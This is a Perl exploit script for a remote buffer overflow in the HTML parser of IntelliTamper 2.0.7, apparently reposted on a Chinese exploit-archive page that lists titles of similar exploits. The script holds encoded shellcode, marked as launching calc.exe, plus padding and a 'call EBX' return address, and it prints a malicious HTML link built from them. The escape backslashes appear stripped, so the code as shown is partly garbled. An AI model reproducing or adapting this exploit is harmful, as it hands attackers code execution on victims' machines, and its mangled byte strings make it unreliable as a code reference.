IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

摘要：#!/usr/bin/perl#usewarnings;usestrict;#CMD="c:windowssystem32calc.exe"...

#!/usr/bin/perl

use warnings;

use strict;

# CMD="c:windowssystem32calc.exe"

# [*] x86/alpha_mixed succeeded, final size 344

my $shellcode =

"xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a" .

"x4ax4ax43x43x43x43x43x43x43x37x52x59x6ax41x58" .

"x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" .

"x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c" .

"x4dx38x47x34x45x50x43x30x43x30x4cx4bx51x55x47" .

"x4cx4cx4bx43x4cx44x45x42x58x45x51x4ax4fx4cx4b" .

"x50x4fx45x48x4cx4bx51x4fx51x30x45x51x4ax4bx50" .

"x49x4cx4bx47x44x4cx4bx45x51x4ax4ex46x51x49x50" .

"x4dx49x4ex4cx4bx34x49x50x43x44x43x37x49x51x49" .

"x5ax44x4dx45x51x49x52x4ax4bx4cx34x47x4bx51x44" .

"x47x54x45x54x43x45x4dx35x4cx4bx51x4fx47x54x45" .

"x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" .

"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4a" .

"x4bx4cx49x51x4cx51x34x43x34x48x43x51x4fx50x31" .

"x4cx36x45x30x51x46x42x44x4cx4bx51x56x46x50x4c" .

"x4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4b" .

"x45x38x43x38x4bx39x4cx38x4cx43x49x50x43x5ax50" .

"x50x43x58x4ax50x4dx5ax45x54x51x4fx42x48x4cx58" .

"x4bx4ex4dx5ax44x4ex46x37x4bx4fx4ax47x42x43x46" .

"x5ax51x4cx42x57x42x49x42x4ex42x44x42x4fx42x57" .

"x43x43x51x4cx43x43x44x39x43x43x43x44x43x55x42" .

"x4dx47x43x50x32x51x4cx43x53x45x31x42x4cx42x43" .

"x46x4ex45x35x44x38x42x45x43x30x45x5ax41x41";

my $evil_html = '<html><head><title>ph33r</title></head><body>' .

#'<a href="http://AAAAAAAAAA' .

#"x41" x 450 .

'<a href="http://' .

$shellcode .

"x41" x 116 .

"x39x5cx3dx7e" . # ascii friendly 'call EBX'

'.htm">ph33r</a>' .

"</body></html>";

print $evil_html;

【IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit】相关文章：

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

★ PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit

★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

★ MS Internet Explorer Recordset Double Free Memory Exploit

★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

★ Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

上一篇： Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

下一篇： Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

学习工具